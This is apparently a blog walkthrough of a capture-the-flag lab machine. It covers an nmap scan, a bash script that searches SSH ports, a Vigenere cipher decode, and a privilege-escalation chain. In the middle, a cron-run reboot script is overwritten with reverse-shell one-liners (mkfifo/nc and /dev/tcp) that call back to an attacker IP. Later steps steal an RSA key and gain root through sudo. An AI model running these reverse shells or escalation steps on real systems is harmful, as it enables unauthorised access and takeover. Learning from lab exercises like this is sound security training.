.png)
5 months ago
46 BOOK THIS SPACE FOR AD
ARTICLE ADDon’t get bored and never give up. Always save the constant values you will use in the shell. For all wordlists, it is recommended that you review /usr/share/wordlists.
These constant values speed up your processes, so you should make it a habit.
Now let’s send a standard ping to the target and check the ICMP message bounce.
We got an answer from the machine. Now let’s save the target for our operations in our /etc/hosts file, this will serve as local DNS.
Now we are ready for our operations.
Switch to Nmap and discover the open doors of the enemy: nmap -sV -sC -oN result_general.txt -T4 -A $target_ip
-sV: Version detection to determine the versions of the services running on open ports.-sC: Run default scripts. This is equivalent to using --script=default.-oN result_general.txt: Output the results to a file named result_general.txt in normal format.-T4: Set the timing template to 4 (Aggressive), making the scan faster.-A: Enable OS detection, version detection, script scanning, and traceroute.This will give you a general report and will take some time. Sometimes interesting details are hidden in non-standard ports, so in real scenarios it may be better to scan all ports patiently: nmap -p- $target_ip -A -oN all_port.txt
You need to wait patiently for the answers.
There are so many doors… We are faced with an SSH-based port forest. You have to discover why.
Now let’s just save the ports: cat result_general.txt | awk -F/ ‘/open/ {b=b”,”$1} END {print substr(b,2)}’ > only_ports.txt
Try to connect manually and understand the logic.
The connections are disconnected directly, but interesting messages such as “Lower” and “Higher” are printed on the screen.
Writing all these ports one by one takes a lot of time. Creating and running an .sh file speeds up the process.
#! /bin/bashIP=10.10.125.65
PORT=12000 #Change port
RESULT=0
lower=0
higher=0
higherdigit=0
lowerdigit=0
echo "IP: "
read IP
echo "RUNNING... WAIT!"
sleep 2
while [ $(echo "$RESULT" | grep "0") ]
do
# StrictHostKeyChecking=no ?> used to send always yes && LogLevel=QUIET ?> remove connection's message
nmap=$(ssh -o StrictHostKeyChecking=no -o LogLevel=QUIET -tt $IP -p $PORT)
if [ $(echo $nmap | grep "Lower") ]; then
if [ "$higherdigit" -eq 1 ] && [ "$lowerdigit" -eq 1 ]
then
export PORT=$((PORT+1))
elif [ "$higher" -eq 1 ] && [ "$lower" -eq 1 ] ; then
export PORT=$((PORT+10))
lowerdigit=1
else
export PORT=$((PORT+100))
lower=1
fi
echo -e "Message:: Lower :: --- PORT ?> $PORT"
fi
if [ $(echo $nmap | grep "Higher") ]; then
if [ "$higherdigit" -eq 1 ] && [ "$lowerdigit" -eq 1 ]
then
export PORT=$((PORT-1))
elif [ "$higher" -eq 1 ] && [ "$lower" -eq 1 ] ; then
export PORT=$((PORT-10))
higherdigit=1
else
export PORT=$((PORT-100))
higher=1
fi
echo -e "Message:: Higher :: --- PORT ?> $PORT"
fi
done
Save this to your local.
Authorize your file as executable: chmod +x port_ssh_scan.sh , then run it.
When this program stops at a port number, we will understand that we are faced with an unexpected message.
Wait for all ports to be scanned.
If you don’t want to use this script, try this on the shell: for i in $(seq 9800 9900); do echo “connecting to port $i”; ssh -o ‘LogLevel=ERROR’ -o ‘StrictHostKeyChecking=no’ -p $i test@10.10.125.65;done | grep -vE ‘Lower|Higher’
The program stopped at port number 10462.
We must check.
A text full of meaningless sentences. This could be a cryptological method. Caesar is usually the first thing that comes to mind, but we have to understand his logic.
You can use this site to crack this and test it yourself: https://cryptii.com/pipes/caesar-cipher
We will prefer to use this: https://www.guballa.de/vigenere-solver
We managed to break it. And we have the secret. Now we can move on to the next step.
Now we have the login information for a user.
Try connecting to this user via the regular ssh port.
We are successful.
You should examine everything you can find.
Let’s look at the authorization mechanism.
Whenever you see reboot, you should always think of crontab. You should check this out. So we may discover a timed reboot.
We were right, our .sh file appears here.
Did you think of it? You are right! Time to manipulate “twasBrillig.sh”!
You can use one of the following two approaches:
1)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.37.34 21222 >/tmp/f
2)
sh -i >& /dev/tcp/10.10.37.34/21222 0>&1
Now let’s replace this file content with our first approach.
Put your machine in listening mode: nc -nlvp 21222
Now we are ready to run the .sh file we manipulated with /sbin/reboot
We got that! Now, discover it.
It looks like a hex, we need to decode it.
Use it: https://www.boxentriq.com/code-breaking/hex-analysis
We obtained another password! Good news.
Let’s look at potential users.
Now that we have found the user that this password can match, let’s authorize it. Turn ssh again for “jabberwock”.
We need some permissions.
Check “id_rsa” file inside the “.ssh” folder which is found in almost all user folders.
Save this locally.
Let’s try to connect with Alice’s RSA key.
We’ve been pretty successful so far.
Let’s complete our process by downloading “linpeas.sh” to the system. Save this locally.
Activate your HTTP server via Python.
Now download “linpeas.sh” on the target machine.
We are ready to go.
It appears that there is a “sudo” rule for the alice user in the /etc/sudoers.d/alice file .
As you can see above there is the alice “sudoers” file, which says that she can run /bin/bash as root, but as another host.
Now use it: sudo -h ssalg-gnikool /bin/bash
-h flag can be used to specify the host.
You will be root!
Bengali (Bangladesh) · 
English (United States) ·